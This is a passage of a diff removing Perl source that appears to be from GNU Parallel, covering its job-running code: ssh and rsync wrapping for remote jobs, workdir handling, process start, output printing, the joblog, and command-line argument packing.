-    delete $self->{'sshlogin_wrap'}; # If sshlogin is changed the wrap is wrong
-    delete $self->{'wrapped'};
-}
-
-sub sshlogin {
-    my $self = shift;
-    return $self->{'sshlogin'};
-}
-
-sub sshlogin_wrap {
-    # Wrap the command with the commands needed to run remotely
-    # Returns:
-    #   $self->{'sshlogin_wrap'} = command wrapped with ssh+transfer commands
-    my $self = shift;
-    my $command = shift;
-    if(not defined $self->{'sshlogin_wrap'}) {
-	my $sshlogin = $self->sshlogin();
-	my $sshcmd = $sshlogin->sshcommand();
-	my $serverlogin = $sshlogin->serverlogin();
-	my ($pre,$post,$cleanup)=("","","");
-
-	if($serverlogin eq ":") {
-	    # No transfer neeeded
-	    $self->{'sshlogin_wrap'} = $command;
-	} else {
-	    # --transfer
-	    $pre .= $self->sshtransfer();
-	    # --return
-	    $post .= $self->sshreturn();
-	    # --cleanup
-	    $post .= $self->sshcleanup();
-	    if($post) {
-		# We need to save the exit status of the job
-		$post = '_EXIT_status=$?; ' . $post . ' exit $_EXIT_status;';
-	    }
-	    # If the remote login shell is (t)csh then use 'setenv'
-	    # otherwise use 'export'
-	    # We cannot use parse_env_var(), as PARALLEL_SEQ changes
-	    # for each command
-	    my $parallel_env =
-		($Global::envwarn
-		 . q{ 'eval `echo $SHELL | grep "/t\\{0,1\\}csh" > /dev/null }
-		 . q{ && echo setenv PARALLEL_SEQ '$PARALLEL_SEQ'\; }
-		 . q{ setenv PARALLEL_PID '$PARALLEL_PID' }
-		 . q{ || echo PARALLEL_SEQ='$PARALLEL_SEQ'\;export PARALLEL_SEQ\; }
-		 . q{ PARALLEL_PID='$PARALLEL_PID'\;export PARALLEL_PID` ;' });
-	    my $remote_pre = "";
-	    my $ssh_options = "";
-	    if(($opt::pipe or $opt::pipepart) and $opt::ctrlc
-	       or
-	       not ($opt::pipe or $opt::pipepart) and not $opt::noctrlc) {
-		# TODO Determine if this is needed
-		# Propagating CTRL-C to kill remote jobs requires
-		# remote jobs to be run with a terminal.
-		$ssh_options = "-tt -oLogLevel=quiet";
-#		$ssh_options = "";
-		# tty - check if we have a tty.
-		# stty:
-		#   -onlcr - make output 8-bit clean
-		#   isig - pass CTRL-C as signal
-		#   -echo - do not echo input
-		$remote_pre .= ::shell_quote_scalar('tty >/dev/null && stty isig -onlcr -echo;');
-	    }
-	    if($opt::workdir) {
-		my $wd = ::shell_quote_file($self->workdir());
-		$remote_pre .= ::shell_quote_scalar("mkdir -p ") . $wd .
-		    ::shell_quote_scalar("; cd ") . $wd .
-		    # exit 255 (instead of exec false) would be the correct thing,
-		    # but that fails on tcsh
-		    ::shell_quote_scalar(qq{ || exec false;});
-	    }
-	    # This script is to solve the problem of
-	    # * not mixing STDERR and STDOUT
-	    # * terminating with ctrl-c
-	    # It works on Linux but not Solaris
-	    # Finishes on Solaris, but wrong exit code:
-	    # $SIG{CHLD} = sub {exit ($?&127 ? 128+($?&127) : 1+$?>>8)};
-	    # Hangs on Solaris, but correct exit code on Linux:
-	    # $SIG{CHLD} = sub { $done = 1 };
-	    # $p->poll;
-	    my $signal_script = "perl -e '".
-	    q{
-		use IO::Poll;
-                $SIG{CHLD} = sub { $done = 1 };
-		$p = IO::Poll->new;
-		$p->mask(STDOUT, POLLHUP);
-		$pid=fork; unless($pid) {setpgrp; exec $ENV{SHELL}, "-c", @ARGV; die "exec: $!\n"}
-                $p->poll;
-		kill SIGHUP, -${pid} unless $done;
-		wait; exit ($?&127 ? 128+($?&127) : 1+$?>>8)
-            } . "' ";
-	    $signal_script =~ s/\s+/ /g;
-
-	    $self->{'sshlogin_wrap'} =
-		($pre
-		 . "$sshcmd $ssh_options $serverlogin $parallel_env "
-		 . $remote_pre
-#		 . ::shell_quote_scalar($signal_script . ::shell_quote_scalar($command))
-		 . ::shell_quote_scalar($command)
-		 . ";"
-		 . $post);
-	}
-    }
-    return $self->{'sshlogin_wrap'};
-}
-
-sub transfer {
-    # Files to transfer
-    # Returns:
-    #   @transfer - File names of files to transfer
-    my $self = shift;
-    my @transfer = ();
-    $self->{'transfersize'} = 0;
-    if($opt::transfer) {
-	for my $record (@{$self->{'commandline'}{'arg_list'}}) {
-	    # Merge arguments from records into args
-	    for my $arg (@$record) {
-		CORE::push @transfer, $arg->orig();
-		# filesize
-		if(-e $arg->orig()) {
-		    $self->{'transfersize'} += (stat($arg->orig()))[7];
-		}
-	    }
-	}
-    }
-    return @transfer;
-}
-
-sub transfersize {
-    my $self = shift;
-    return $self->{'transfersize'};
-}
-
-sub sshtransfer {
-    # Returns for each transfer file:
-    #   rsync $file remote:$workdir
-    my $self = shift;
-    my @pre;
-    my $sshlogin = $self->sshlogin();
-    my $workdir = $self->workdir();
-    for my $file ($self->transfer()) {
-      push @pre, $sshlogin->rsync_transfer_cmd($file,$workdir).";";
-    }
-    return join("",@pre);
-}
-
-sub return {
-    # Files to return
-    # Non-quoted and with {...} substituted
-    # Returns:
-    #   @non_quoted_filenames
-    my $self = shift;
-    return $self->{'commandline'}->
-	replace_placeholders($self->{'commandline'}{'return_files'},0,0);
-}
-
-sub returnsize {
-    # This is called after the job has finished
-    # Returns:
-    #   $number_of_bytes transferred in return
-    my $self = shift;
-    for my $file ($self->return()) {
-	if(-e $file) {
-	    $self->{'returnsize'} += (stat($file))[7];
-	}
-    }
-    return $self->{'returnsize'};
-}
-
-sub sshreturn {
-    # Returns for each return-file:
-    #   rsync remote:$workdir/$file .
-    my $self = shift;
-    my $sshlogin = $self->sshlogin();
-    my $sshcmd = $sshlogin->sshcommand();
-    my $serverlogin = $sshlogin->serverlogin();
-    my $rsync_opt = "-rlDzR -e".::shell_quote_scalar($sshcmd);
-    my $pre = "";
-    for my $file ($self->return()) {
-	$file =~ s:^\./::g; # Remove ./ if any
-	my $relpath = ($file !~ m:^/:); # Is the path relative?
-	my $cd = "";
-	my $wd = "";
-	if($relpath) {
-	    #   rsync -avR /foo/./bar/baz.c remote:/tmp/
-	    # == (on old systems)
-	    #   rsync -avR --rsync-path="cd /foo; rsync" remote:bar/baz.c /tmp/
-	    $wd = ::shell_quote_file($self->workdir()."/");
-	}
-	# Only load File::Basename if actually needed
-	$Global::use{"File::Basename"} ||= eval "use File::Basename; 1;";
-	# dir/./file means relative to dir, so remove dir on remote
-	$file =~ m:(.*)/\./:;
-	my $basedir = $1 ? ::shell_quote_file($1."/") : "";
-	my $nobasedir = $file;
-	$nobasedir =~ s:.*/\./::;
-	$cd = ::shell_quote_file(::dirname($nobasedir));
-	my $rsync_cd = '--rsync-path='.::shell_quote_scalar("cd $wd$cd; rsync");
-	my $basename = ::shell_quote_scalar(::shell_quote_file(basename($file)));
-	# --return
-	#   mkdir -p /home/tange/dir/subdir/;
-        #   rsync (--protocol 30) -rlDzR --rsync-path="cd /home/tange/dir/subdir/; rsync"
-        #   server:file.gz /home/tange/dir/subdir/
-	$pre .= "mkdir -p $basedir$cd; ".$sshlogin->rsync()." $rsync_cd $rsync_opt $serverlogin:".
-	     $basename . " ".$basedir.$cd.";";
-    }
-    return $pre;
-}
-
-sub sshcleanup {
-    # Return the sshcommand needed to remove the file
-    # Returns:
-    #   ssh command needed to remove files from sshlogin
-    my $self = shift;
-    my $sshlogin = $self->sshlogin();
-    my $sshcmd = $sshlogin->sshcommand();
-    my $serverlogin = $sshlogin->serverlogin();
-    my $workdir = $self->workdir();
-    my $cleancmd = "";
-
-    for my $file ($self->cleanup()) {
-	my @subworkdirs = parentdirs_of($file);
-	$cleancmd .= $sshlogin->cleanup_cmd($file,$workdir).";";
-    }
-    if(defined $opt::workdir and $opt::workdir eq "...") {
-	$cleancmd .= "$sshcmd $serverlogin rm -rf " . ::shell_quote_scalar($workdir).';';
-    }
-    return $cleancmd;
-}
-
-sub cleanup {
-    # Returns:
-    #   Files to remove at cleanup
-    my $self = shift;
-    if($opt::cleanup) {
-	my @transfer = $self->transfer();
-	my @return = $self->return();
-	return (@transfer,@return);
-    } else {
-	return ();
-    }
-}
-
-sub workdir {
-    # Returns:
-    #   the workdir on a remote machine
-    my $self = shift;
-    if(not defined $self->{'workdir'}) {
-	my $workdir;
-	if(defined $opt::workdir) {
-	    if($opt::workdir eq ".") {
-		# . means current dir
-		my $home = $ENV{'HOME'};
-		eval 'use Cwd';
-		my $cwd = cwd();
-		$workdir = $cwd;
-		if($home) {
-		    # If homedir exists: remove the homedir from
-		    # workdir if cwd starts with homedir
-		    # E.g. /home/foo/my/dir => my/dir
-		    # E.g. /tmp/my/dir => /tmp/my/dir
-		    my ($home_dev, $home_ino) = (stat($home))[0,1];
-		    my $parent = "";
-		    my @dir_parts = split(m:/:,$cwd);
-		    my $part;
-		    while(defined ($part = shift @dir_parts)) {
-			$part eq "" and next;
-			$parent .= "/".$part;
-			my ($parent_dev, $parent_ino) = (stat($parent))[0,1];
-			if($parent_dev == $home_dev and $parent_ino == $home_ino) {
-			    # dev and ino is the same: We found the homedir.
-			    $workdir = join("/",@dir_parts);
-			    last;
-			}
-		    }
-		}
-		if($workdir eq "") {
-		    $workdir = ".";
-		}
-	    } elsif($opt::workdir eq "...") {
-		$workdir = ".parallel/tmp/" . ::hostname() . "-" . $$
-		    . "-" . $self->seq();
-	    } else {
-		$workdir = $opt::workdir;
-		# Rsync treats /./ special. We dont want that
-		$workdir =~ s:/\./:/:g; # Remove /./
-		$workdir =~ s:/+$::; # Remove ending / if any
-		$workdir =~ s:^\./::g; # Remove starting ./ if any
-	    }
-	} else {
-	    $workdir = ".";
-	}
-	$self->{'workdir'} = ::shell_quote_scalar($workdir);
-    }
-    return $self->{'workdir'};
-}
-
-sub parentdirs_of {
-    # Return:
-    #   all parentdirs except . of this dir or file - sorted desc by length
-    my $d = shift;
-    my @parents = ();
-    while($d =~ s:/[^/]+$::) {
-	if($d ne ".") {
-	    push @parents, $d;
-	}
-    }
-    return @parents;
-}
-
-sub start {
-    # Setup STDOUT and STDERR for a job and start it.
-    # Returns:
-    #   job-object or undef if job not to run
-    my $job = shift;
-    # Get the shell command to be executed (possibly with ssh infront).
-    my $command = $job->wrapped();
-
-    if($Global::interactive or $Global::stderr_verbose) {
-	if($Global::interactive) {
-	    print $Global::original_stderr "$command ?...";
-	    open(my $tty_fh, "<", "/dev/tty") || ::die_bug("interactive-tty");
-	    my $answer = <$tty_fh>;
-	    close $tty_fh;
-	    my $run_yes = ($answer =~ /^\s*y/i);
-	    if (not $run_yes) {
-		$command = "true"; # Run the command 'true'
-	    }
-	} else {
-	    print $Global::original_stderr "$command\n";
-	}
-    }
-
-    my $pid;
-    $job->openoutputfiles();
-    my($stdout_fh,$stderr_fh) = ($job->fh(1,"w"),$job->fh(2,"w"));
-    local (*IN,*OUT,*ERR);
-    open OUT, '>&', $stdout_fh or ::die_bug("Can't redirect STDOUT: $!");
-    open ERR, '>&', $stderr_fh or ::die_bug("Can't dup STDOUT: $!");
-
-    if(($opt::dryrun or $Global::verbose) and $opt::ungroup) {
-	if($Global::verbose <= 1) {
-	    print $stdout_fh $job->replaced(),"\n";
-	} else {
-	    # Verbose level > 1: Print the rsync and stuff
-	    print $stdout_fh $command,"\n";
-	}
-    }
-    if($opt::dryrun) {
-	$command = "true";
-    }
-    $ENV{'PARALLEL_SEQ'} = $job->seq();
-    $ENV{'PARALLEL_PID'} = $$;
-    ::debug("run", $Global::total_running, " processes . Starting (",
-	    $job->seq(), "): $command\n");
-    if($opt::pipe) {
-	my ($stdin_fh);
-	# The eval is needed to catch exception from open3
-	eval {
-	    $pid = ::open3($stdin_fh, ">&OUT", ">&ERR", $Global::shell, "-c", $command) ||
-		::die_bug("open3-pipe");
-	    1;
-	};
-	$job->set_fh(0,"w",$stdin_fh);
-    } elsif(@opt::a and not $Global::stdin_in_opt_a and $job->seq() == 1
-	    and $job->sshlogin()->string() eq ":") {
-	# Give STDIN to the first job if using -a (but only if running
-	# locally - otherwise CTRL-C does not work for other jobs Bug#36585)
-	*IN = *STDIN;
-	# The eval is needed to catch exception from open3
-	eval {
-	    $pid = ::open3("<&IN", ">&OUT", ">&ERR", $Global::shell, "-c", $command) ||
-		::die_bug("open3-a");
-	    1;
-	};
-	# Re-open to avoid complaining
-	open(STDIN, "<&", $Global::original_stdin)
-	    or ::die_bug("dup-\$Global::original_stdin: $!");
-    } elsif ($opt::tty and not $Global::tty_taken and -c "/dev/tty" and
-	     open(my $devtty_fh, "<", "/dev/tty")) {
-	# Give /dev/tty to the command if no one else is using it
-	*IN = $devtty_fh;
-	# The eval is needed to catch exception from open3
-	eval {
-	    $pid = ::open3("<&IN", ">&OUT", ">&ERR", $Global::shell, "-c", $command) ||
-		::die_bug("open3-/dev/tty");
-	    $Global::tty_taken = $pid;
-	    close $devtty_fh;
-	    1;
-	};
-    } else {
-	# The eval is needed to catch exception from open3
-	eval {
-	    $pid = ::open3(::gensym, ">&OUT", ">&ERR", $Global::shell, "-c", $command) ||
-		::die_bug("open3-gensym");
-	    1;
-	};
-    }
-    if($pid) {
-	# A job was started
-	$Global::total_running++;
-	$Global::total_started++;
-	$job->set_pid($pid);
-	$job->set_starttime();
-	$Global::running{$job->pid()} = $job;
-	if($opt::timeout) {
-	    $Global::timeoutq->insert($job);
-	}
-	$Global::newest_job = $job;
-	$Global::newest_starttime = ::now();
-	return $job;
-    } else {
-	# No more processes
-	::debug("run", "Cannot spawn more jobs.\n");
-	return undef;
-    }
-}
-
-sub tmux_wrap {
-    # Wrap command with tmux for session pPID
-    # Input:
-    #   $actual_command = the actual command being run (incl ssh wrap)
-    my $self = shift;
-    my $actual_command = shift;
-    # Temporary file name. Used for fifo to communicate exit val
-    my ($fh, $tmpfile) = ::tmpfile(SUFFIX => ".tmx");
-    $Global::unlink{$tmpfile}=1;
-    close $fh;
-    unlink $tmpfile;
-    my $visual_command = $self->replaced();
-    my $title = $visual_command;
-    # ; causes problems
-    # ascii 194-245 annoys tmux
-    $title =~ tr/[\011-\016;\302-\365]//d;
-
-    my $tmux;
-    if($Global::total_running == 0) {
-	$tmux = "tmux new-session -s p$$ -d -n ".
-	    ::shell_quote_scalar($title);
-	print $Global::original_stderr "See output with: tmux attach -t p$$\n";
-    } else {
-	$tmux = "tmux new-window -t p$$ -n ".::shell_quote_scalar($title);
-    }
-    return "mkfifo $tmpfile; $tmux ".
-	# Run in tmux
-	::shell_quote_scalar(
-	"(".$actual_command.');(echo $?$status;echo 255) >'.$tmpfile."&".
-	"echo ".::shell_quote_scalar($visual_command).";".
-	"echo \007Job finished at: `date`;sleep 10").
-	# Run outside tmux
-	# Read the first line from the fifo and use that as status code
-	";  exit `perl -ne 'unlink \$ARGV; 1..1 and print' $tmpfile` ";
-}
-
-sub is_already_in_results {
-    # Do we already have results for this job?
-    # Returns:
-    #   $job_already_run = bool whether there is output for this or not
-    my $job = $_[0];
-    my $args_as_dirname = $job->{'commandline'}->args_as_dirname();
-    # prefix/name1/val1/name2/val2/
-    my $dir = $opt::results."/".$args_as_dirname;
-    ::debug("run", "Test $dir/stdout", -e "$dir/stdout", "\n");
-    return -e "$dir/stdout";
-}
-
-sub is_already_in_joblog {
-    my $job = shift;
-    return vec($Global::job_already_run,$job->seq(),1);
-}
-
-sub set_job_in_joblog {
-    my $job = shift;
-    vec($Global::job_already_run,$job->seq(),1) = 1;
-}
-
-sub should_be_retried {
-    # Should this job be retried?
-    # Returns
-    #   0 - do not retry
-    #   1 - job queued for retry
-    my $self = shift;
-    if (not $opt::retries) {
-	return 0;
-    }
-    if(not $self->exitstatus()) {
-	# Completed with success. If there is a recorded failure: forget it
-	$self->reset_failed_here();
-	return 0
-    } else {
-	# The job failed. Should it be retried?
-	$self->add_failed_here();
-	if($self->total_failed() == $opt::retries) {
-	    # This has been retried enough
-	    return 0;
-	} else {
-	    # This command should be retried
-	    $self->set_endtime(undef);
-	    $Global::JobQueue->unget($self);
-	    ::debug("run", "Retry ", $self->seq(), "\n");
-	    return 1;
-	}
-    }
-}
-
-sub print {
-    # Print the output of the jobs
-    # Returns: N/A
-
-    my $self = shift;
-    ::debug("print", ">>joboutput ", $self->replaced(), "\n");
-    if($opt::dryrun) {
-	# Nothing was printed to this job:
-	# cleanup tmp files if --files was set
-	unlink $self->fh(1,"name");
-    }
-    if($opt::pipe and $self->virgin()) {
-	# Skip --joblog, --dryrun, --verbose
-    } else {
-	if($Global::joblog and defined $self->{'exitstatus'}) {
-	    # Add to joblog when finished
-	    $self->print_joblog();
-	}
-
-	# Printing is only relevant for grouped/--line-buffer output.
-	$opt::ungroup and return;
-	# Check for disk full
-	exit_if_disk_full();
-
-	if(($opt::dryrun or $Global::verbose)
-	   and
-	   not $self->{'verbose_printed'}) {
-	    $self->{'verbose_printed'}++;
-	    if($Global::verbose <= 1) {
-		print STDOUT $self->replaced(),"\n";
-	    } else {
-		# Verbose level > 1: Print the rsync and stuff
-		print STDOUT $self->wrapped(),"\n";
-	    }
-	    # If STDOUT and STDERR are merged,
-	    # we want the command to be printed first
-	    # so flush to avoid STDOUT being buffered
-	    flush STDOUT;
-	}
-    }
-    for my $fdno (sort { $a <=> $b } keys %Global::fd) {
-	# Sort by file descriptor numerically: 1,2,3,..,9,10,11
-	$fdno == 0 and next;
-	my $out_fd = $Global::fd{$fdno};
-	my $in_fh = $self->fh($fdno,"r");
-	if(not $in_fh) {
-	    if(not $Job::file_descriptor_warning_printed{$fdno}++) {
-		# ::warning("File descriptor $fdno not defined\n");
-	    }
-	    next;
-	}
-	::debug("print", "File descriptor $fdno (", $self->fh($fdno,"name"), "):");
-	if($opt::files) {
-	    # If --compress: $in_fh must be closed first.
-	    close $self->fh($fdno,"w");
-	    close $in_fh;
-	    if($opt::pipe and $self->virgin()) {
-		# Nothing was printed to this job:
-		# cleanup unused tmp files if --files was set
-		for my $fdno (1,2) {
-		    unlink $self->fh($fdno,"name");
-		    unlink $self->fh($fdno,"unlink");
-		}
-	    } elsif($fdno == 1 and $self->fh($fdno,"name")) {
-		print $out_fd $self->fh($fdno,"name"),"\n";
-	    }
-	} elsif($opt::linebuffer) {
-	    # Line buffered print out
-	    $self->linebuffer_print($fdno,$in_fh,$out_fd);
-	} else {
-	    my $buf;
-	    close $self->fh($fdno,"w");
-	    seek $in_fh, 0, 0;
-	    # $in_fh is now ready for reading at position 0
-	    if($opt::tag or defined $opt::tagstring) {
-		my $tag = $self->tag();
-		if($fdno == 2) {
-		    # OpenSSH_3.6.1p2 gives 'tcgetattr: Invalid argument' with -tt
-		    # This is a crappy way of ignoring it.
-		    while(<$in_fh>) {
-			if(/^(client_process_control: )?tcgetattr: Invalid argument\n/) {
-			    # Skip
-			} else {
-			    print $out_fd $tag,$_;
-			}
-			# At most run the loop once
-			last;
-		    }
-		}
-		while(<$in_fh>) {
-		    print $out_fd $tag,$_;
-		}
-	    } else {
-		my $buf;
-		if($fdno == 2) {
-		    # OpenSSH_3.6.1p2 gives 'tcgetattr: Invalid argument' with -tt
-		    # This is a crappy way of ignoring it.
-		    sysread($in_fh,$buf,1_000);
-		    $buf =~ s/^(client_process_control: )?tcgetattr: Invalid argument\n//;
-		    print $out_fd $buf;
-		}
-		while(sysread($in_fh,$buf,32768)) {
-		    print $out_fd $buf;
-		}
-	    }
-	    close $in_fh;
-	}
-	flush $out_fd;
-    }
-    ::debug("print", "<<joboutput @command\n");
-}
-
-sub linebuffer_print {
-    my $self = shift;
-    my ($fdno,$in_fh,$out_fd) = @_;
-    my $partial = \$self->{'partial_line',$fdno};
-
-    if(defined $self->{'exitstatus'}) {
-	# If the job is dead: close printing fh. Needed for --compress
-	close $self->fh($fdno,"w");
-	if($opt::compress) {
-	    # Blocked reading in final round
-	    $Global::use{"Fcntl"} ||= eval "use Fcntl qw(:DEFAULT :flock); 1;";
-	    for my $fdno (1,2) {
-		my $fdr = $self->fh($fdno,'r');
-		my $flags;
-		fcntl($fdr, &F_GETFL, $flags) || die $!; # Get the current flags on the filehandle
-		$flags &= ~&O_NONBLOCK; # Remove non-blocking to the flags
-		fcntl($fdr, &F_SETFL, $flags) || die $!; # Set the flags on the filehandle
-	    }
-	}
-    }
-    # This seek will clear EOF
-    seek $in_fh, tell($in_fh), 0;
-    # The read is non-blocking: The $in_fh is set to non-blocking.
-    # 32768 --tag = 5.1s
-    # 327680 --tag = 4.4s
-    # 1024000 --tag = 4.4s
-    # 3276800 --tag = 4.3s
-    # 32768000 --tag = 4.7s
-    # 10240000 --tag = 4.3s
-    while(read($in_fh,substr($$partial,length $$partial),3276800)) {
-	# Append to $$partial
-	# Find the last \n
-	my $i = rindex($$partial,"\n");
-	if($i != -1) {
-	    # One or more complete lines were found
-	    if($fdno == 2 and not $self->{'printed_first_line',$fdno}++) {
-		# OpenSSH_3.6.1p2 gives 'tcgetattr: Invalid argument' with -tt
-		# This is a crappy way of ignoring it.
-		$$partial =~ s/^(client_process_control: )?tcgetattr: Invalid argument\n//;
-		# Length of partial line has changed: Find the last \n again
-		$i = rindex($$partial,"\n");
-	    }
-	    if($opt::tag or defined $opt::tagstring) {
-		# Replace ^ with $tag within the full line
-		my $tag = $self->tag();
-		substr($$partial,0,$i+1) =~ s/^/$tag/gm;
-		# Length of partial line has changed: Find the last \n again
-		$i = rindex($$partial,"\n");
-	    }
-	    # Print up to and including the last \n
-	    print $out_fd substr($$partial,0,$i+1);
-	    # Remove the printed part
-	    substr($$partial,0,$i+1)="";
-	}
-    }
-    if(defined $self->{'exitstatus'}) {
-	# If the job is dead: print the remaining partial line
-	# read remaining
-	if($$partial and ($opt::tag or defined $opt::tagstring)) {
-	    my $tag = $self->tag();
-	    $$partial =~ s/^/$tag/gm;
-	}
-	print $out_fd $$partial;
-	# Release the memory
-	$$partial = undef;
-	if($self->fh($fdno,"rpid") and CORE::kill 0, $self->fh($fdno,"rpid")) {
-	    # decompress still running
-	} else {
-	    # decompress done: close fh
-	    close $in_fh;
-	}
-    }
-}
-
-sub print_joblog {
-    my $self = shift;
-    my $cmd;
-    if($Global::verbose <= 1) {
-	$cmd = $self->replaced();
-    } else {
-	# Verbose level > 1: Print the rsync and stuff
-	$cmd = "@command";
-    }
-    print $Global::joblog
-	join("\t", $self->seq(), $self->sshlogin()->string(),
-	     $self->starttime(), sprintf("%10.3f",$self->runtime()),
-	     $self->transfersize(), $self->returnsize(),
-	     $self->exitstatus(), $self->exitsignal(), $cmd
-	). "\n";
-    flush $Global::joblog;
-    $self->set_job_in_joblog();
-}
-
-sub tag {
-    my $self = shift;
-    if(not defined $self->{'tag'}) {
-	$self->{'tag'} = $self->{'commandline'}->
-	    replace_placeholders([$opt::tagstring],0,0)."\t";
-    }
-    return $self->{'tag'};
-}
-
-sub hostgroups {
-    my $self = shift;
-    if(not defined $self->{'hostgroups'}) {
-	$self->{'hostgroups'} = $self->{'commandline'}->{'arg_list'}[0][0]->{'hostgroups'};
-    }
-    return @{$self->{'hostgroups'}};
-}
-
-sub exitstatus {
-    my $self = shift;
-    return $self->{'exitstatus'};
-}
-
-sub set_exitstatus {
-    my $self = shift;
-    my $exitstatus = shift;
-    if($exitstatus) {
-	# Overwrite status if non-zero
-	$self->{'exitstatus'} = $exitstatus;
-    } else {
-	# Set status but do not overwrite
-	# Status may have been set by --timeout
-	$self->{'exitstatus'} ||= $exitstatus;
-    }
-}
-
-sub exitsignal {
-    my $self = shift;
-    return $self->{'exitsignal'};
-}
-
-sub set_exitsignal {
-    my $self = shift;
-    my $exitsignal = shift;
-    $self->{'exitsignal'} = $exitsignal;
-}
-
-{
-    my ($disk_full_fh, $b8193, $name);
-    sub exit_if_disk_full {
-	# Checks if $TMPDIR is full by writing 8kb to a tmpfile
-	# If the disk is full: Exit immediately.
-	# Returns:
-	#   N/A
-	if(not $disk_full_fh) {
-	    ($disk_full_fh, $name) = ::tmpfile(SUFFIX => ".df");
-	    unlink $name;
-	    $b8193 = "x"x8193;
-	}
-	# Linux does not discover if a disk is full if writing <= 8192
-	# Tested on:
-	# bfs btrfs cramfs ext2 ext3 ext4 ext4dev jffs2 jfs minix msdos
-	# ntfs reiserfs tmpfs ubifs vfat xfs
-	# TODO this should be tested on different OS similar to this:
-	#
-	# doit() {
-	#   sudo mount /dev/ram0 /mnt/loop; sudo chmod 1777 /mnt/loop
-	#   seq 100000 | parallel --tmpdir /mnt/loop/ true &
-	#   seq 6900000 > /mnt/loop/i && echo seq OK
-	#   seq 6980868 > /mnt/loop/i
-	#   seq 10000 > /mnt/loop/ii
-	#   sleep 3
-	#   sudo umount /mnt/loop/ || sudo umount -l /mnt/loop/
-	#   echo >&2
-	# }
-	print $disk_full_fh $b8193;
-	if(not $disk_full_fh
-	   or
-	   tell $disk_full_fh == 0) {
-	    ::error("Output is incomplete. Cannot append to buffer file in $ENV{'TMPDIR'}. Is the disk full?\n");
-	    ::error("Change \$TMPDIR with --tmpdir or use --compress.\n");
-	    ::wait_and_exit(255);
-	}
-	truncate $disk_full_fh, 0;
-	seek($disk_full_fh, 0, 0) || die;
-    }
-}
-
-
-package CommandLine;
-
-sub new {
-    my $class = shift;
-    my $seq = shift;
-    my $commandref = shift;
-    $commandref || die;
-    my $arg_queue = shift;
-    my $context_replace = shift;
-    my $max_number_of_args = shift; # for -N and normal (-n1)
-    my $return_files = shift;
-    my $replacecount_ref = shift;
-    my $len_ref = shift;
-    my %replacecount = %$replacecount_ref;
-    my %len = %$len_ref;
-    for (keys %$replacecount_ref) {
-	# Total length of this replacement string {} replaced with all args
-	$len{$_} = 0;
-    }
-    return bless {
-	'command' => $commandref,
-	'seq' => $seq,
-	'len' => \%len,
-	'arg_list' => [],
-	'arg_queue' => $arg_queue,
-	'max_number_of_args' => $max_number_of_args,
-	'replacecount' => \%replacecount,
-	'context_replace' => $context_replace,
-	'return_files' => $return_files,
-	'replaced' => undef,
-    }, ref($class) || $class;
-}
-
-sub seq {
-    my $self = shift;
-    return $self->{'seq'};
-}
-
-{
-    my $max_slot_number;
-
-    sub slot {
-	# Find the number of a free job slot and return it
-	# Uses:
-	#   @Global::slots
-	# Returns:
-	#   $jobslot = number of jobslot
-	my $self = shift;
-	if(not $self->{'slot'}) {
-	    if(not @Global::slots) {
-		# $Global::max_slot_number will typically be $Global::max_jobs_running
-		push @Global::slots, ++$max_slot_number;
-	    }
-	    $self->{'slot'} = shift @Global::slots;
-	}
-	return $self->{'slot'};
-    }
-}
-
-sub populate {
-    # Add arguments from arg_queue until the number of arguments or
-    # max line length is reached
-    # Uses:
-    #   $Global::minimal_command_line_length
-    #   $opt::cat
-    #   $opt::fifo
-    #   $Global::JobQueue
-    #   $opt::m
-    #   $opt::X
-    #   $CommandLine::already_spread
-    #   $Global::max_jobs_running
-    # Returns: N/A
-    my $self = shift;
-    my $next_arg;
-    my $max_len = $Global::minimal_command_line_length || Limits::Command::max_length();
-
-    if($opt::cat or $opt::fifo) {
-	# Generate a tempfile name that will be used as {}
-	my($outfh,$name) = ::tmpfile(SUFFIX => ".pip");
-	close $outfh;
-	# Unlink is needed if: ssh otheruser@localhost
-	unlink $name;
-	$Global::JobQueue->{'commandlinequeue'}->{'arg_queue'}->unget([Arg->new($name)]);
-    }
-
-    while (not $self->{'arg_queue'}->empty()) {
-	$next_arg = $self->{'arg_queue'}->get();
-	if(not defined $next_arg) {
-	    next;
-	}
-	$self->push($next_arg);
-	if($self->len() >= $max_len) {
-	    # Command length is now > max_length
-	    # If there are arguments: remove the last
-	    # If there are no arguments: Error
-	    # TODO stuff about -x opt_x
-	    if($self->number_of_args() > 1) {
-		# There is something to work on
-		$self->{'arg_queue'}->unget($self->pop());
-		last;
-	    } else {
-		my $args = join(" ", map { $_->orig() } @$next_arg);
-		::error("Command line too long (",
-			$self->len(), " >= ",
-			$max_len,
-			") at number ",
-			$self->{'arg_queue'}->arg_number(),
-			": ".
-			(substr($args,0,50))."...\n");
-		$self->{'arg_queue'}->unget($self->pop());
-		::wait_and_exit(255);
-	    }
-	}
-
-	if(defined $self->{'max_number_of_args'}) {
-	    if($self->number_of_args() >= $self->{'max_number_of_args'}) {
-		last;
-	    }
-	}
-    }
-    if(($opt::m or $opt::X) and not $CommandLine::already_spread
-       and $self->{'arg_queue'}->empty() and $Global::max_jobs_running) {
-	# -m or -X and EOF => Spread the arguments over all jobslots
-	# (unless they are already spread)
-	$CommandLine::already_spread ||= 1;
-	if($self->number_of_args() > 1) {
-	    $self->{'max_number_of_args'} =
-		::ceil($self->number_of_args()/$Global::max_jobs_running);
-	    $Global::JobQueue->{'commandlinequeue'}->{'max_number_of_args'} =
-		$self->{'max_number_of_args'};
-	    $self->{'arg_queue'}->unget($self->pop_all());
-	    while($self->number_of_args() < $self->{'max_number_of_args'}) {
-		$self->push($self->{'arg_queue'}->get());
-	    }
-	}
-    }
-}
-
-sub push {
-    # Add one or more records as arguments
-    # Returns: N/A
-    my $self = shift;
-    my $record = shift;
-    push @{$self->{'arg_list'}}, $record;
-
-    my $quote_arg = $Global::noquote ? 0 : not $Global::quoting;
-    my $rep;
-    for my $arg (@$record) {
-	if(defined $arg) {
-	    for my $perlexpr (keys %{$self->{'replacecount'}}) {
-		# 50% faster than below
-		$self->{'len'}{$perlexpr} += length $arg->replace($perlexpr,$quote_arg,$self);
-		# $rep = $arg->replace($perlexpr,$quote_arg,$self);
-		# $self->{'len'}{$perlexpr} += length $rep;
-		# ::debug("length", "Length: ", length $rep,
-		# "(", $perlexpr, "=>", $rep, ")\n");
-	    }
-	}
-    }
-}
-
-sub pop {
-    # Remove last argument
-    # Returns:
-    #   the last record
-    my $self = shift;
-    my $record = pop @{$self->{'arg_list'}};
-    my $quote_arg = $Global::noquote ? 0 : not $Global::quoting;
-    for my $arg (@$record) {
-	if(defined $arg) {
-	    for my $perlexpr (keys %{$self->{'replacecount'}}) {
-		$self->{'len'}{$perlexpr} -=
-		    length $arg->replace($perlexpr,$quote_arg,$self);
-	    }
-	}
